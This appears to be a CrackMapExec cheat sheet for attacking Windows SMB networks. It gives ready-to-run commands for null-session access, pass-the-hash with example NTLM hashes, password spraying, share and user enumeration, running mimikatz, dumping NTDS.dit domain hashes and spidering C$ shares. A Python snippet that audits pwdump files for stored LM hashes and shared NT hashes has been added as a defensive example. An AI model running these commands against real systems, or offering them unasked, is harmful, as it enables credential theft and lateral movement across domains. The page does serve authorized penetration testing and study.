CrackMapExec

# Usage:
crackmapexec smb 192.168.1.1/24

# NULL Sessions
crackmapexec smb <target(s)> -u '' -p ''  

# Checking auth
crackmapexec smb 192.168.1.1/24 -u CoolAdmin -p ARealGoodPassword 

# Passing the hash
crackmapexec smb 192.168.1.1/24 -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B

# Running Modules
crackmapexec smb 192.168.1.1/24 -u Administrator -p Password1 -M mimikatz

# Enumerate shares
crackmapexec smb 192.168.1.1/24 -u Administrator -p Password1 --shares

# Enumerate domain users
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --users  

# Authentication + Checking Credentials (Domain)
# Failed logins result in a [-]
# Successful logins result in a [+] Domain\Username:Password

# User/Hash - Pass the HASH after obtaining credentials such as
Administrator:500:aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c:::

# You can use either the full LM:NT hash or just the NT hash (the second half)
cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT'
cme smb 192.168.1.0/24 -u UserNAme -H 'NTHASH'
cme smb 192.168.1.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c'
cme smb 192.168.1.0/24 -u Administrator -H '13b29964cc2480b4ef454c59562e675c'
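
The pwdump-style line above carries four fields that matter: user, RID, LM hash and NT hash. As an added example (not from the original page or the CrackMapExec project), this Python code parses such lines from an authorized audit dump and reports accounts that still store a real LM hash and accounts that share one NT hash, the condition that lets a single hash authenticate across many hosts. The function names and sample account names are assumptions; the hash values are reused from this page.

```python
import re
from collections import defaultdict

# LM hash of the empty string: the placeholder stored when no LM hash is kept.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
HEX32 = re.compile(r"^[0-9a-fA-F]{32}$")


def parse_pwdump(line):
    """Split one 'user:rid:lm:nt:::' line into a dict; raise ValueError if malformed."""
    parts = line.strip().split(":")
    if len(parts) < 4:
        raise ValueError("expected user:rid:lm:nt:::")
    user, rid, lm, nt = parts[:4]
    if not rid.isdigit() or not HEX32.match(lm) or not HEX32.match(nt):
        raise ValueError("bad RID or hash field in line for %r" % user)
    return {"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()}


def audit(lines):
    """Return (accounts with a real LM hash, groups of accounts sharing one NT hash)."""
    lm_stored, by_nt = [], defaultdict(list)
    for line in lines:
        if not line.strip():
            continue  # skip blank lines in the dump
        rec = parse_pwdump(line)
        if rec["lm"] != EMPTY_LM:
            lm_stored.append(rec["user"])
        by_nt[rec["nt"]].append(rec["user"])
    shared = sorted(sorted(users) for users in by_nt.values() if len(users) > 1)
    return lm_stored, shared


# Constructed sample: hash values come from this page, account names are made up.
SAMPLE = [
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c:::",
    "svc_backup:1104:aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c:::",
    "legacy:1105:e52cac67419a9a2238f10713b629b565:64f12cddaa88057e06a81b54e73b949b:::",
]

if __name__ == "__main__":
    lm_stored, shared = audit(SAMPLE)
    print("LM hash stored:", lm_stored)
    print("Same NT hash:", shared)
```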

# Test one password against a list of users; --continue-on-success keeps checking the remaining users after a valid login
cme smb 192.168.1.101 -u /path/to/users.txt -p Summer18 --continue-on-success  

# Dump NTDS.dit hashes from the target DC using the secretsdump.py technique (default method is drsuapi; vss uses a volume shadow copy)
cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss

# Spider the C$ share for files with txt in the name. This matches user.txt and usertxt.html. The $ must be escaped in the shell
cme smb 10.10.10.178 -u USER -p PASSWORD --spider C\$ --pattern txt

# Mimikatz module
cme <protocol> <target(s)> -u Administrator -p 'P@ssw0rd' -M mimikatz -o COMMAND='privilege::debug' 

References:

https://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec/

https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference

https://blog.ropnop.com/practical-usage-of-ntlm-hashes/

Github: https://github.com/byt3bl33d3r/CrackMapExec/
